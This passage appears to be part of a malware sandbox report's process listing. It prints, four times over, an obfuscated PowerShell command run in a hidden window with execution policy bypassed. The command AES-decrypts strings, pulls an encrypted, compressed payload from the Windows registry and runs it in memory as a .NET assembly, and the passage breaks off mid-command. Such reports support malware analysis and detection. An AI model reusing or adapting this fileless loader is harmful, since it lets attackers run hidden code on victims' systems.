[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        27⤵
        
        PID:8400
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(5824).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        27⤵
        
        PID:4200
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(5824).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        27⤵
        Hide Artifacts: Hidden Window
        
        PID:8532
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(5824).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        27⤵
        
        PID:1868
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(5824).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join 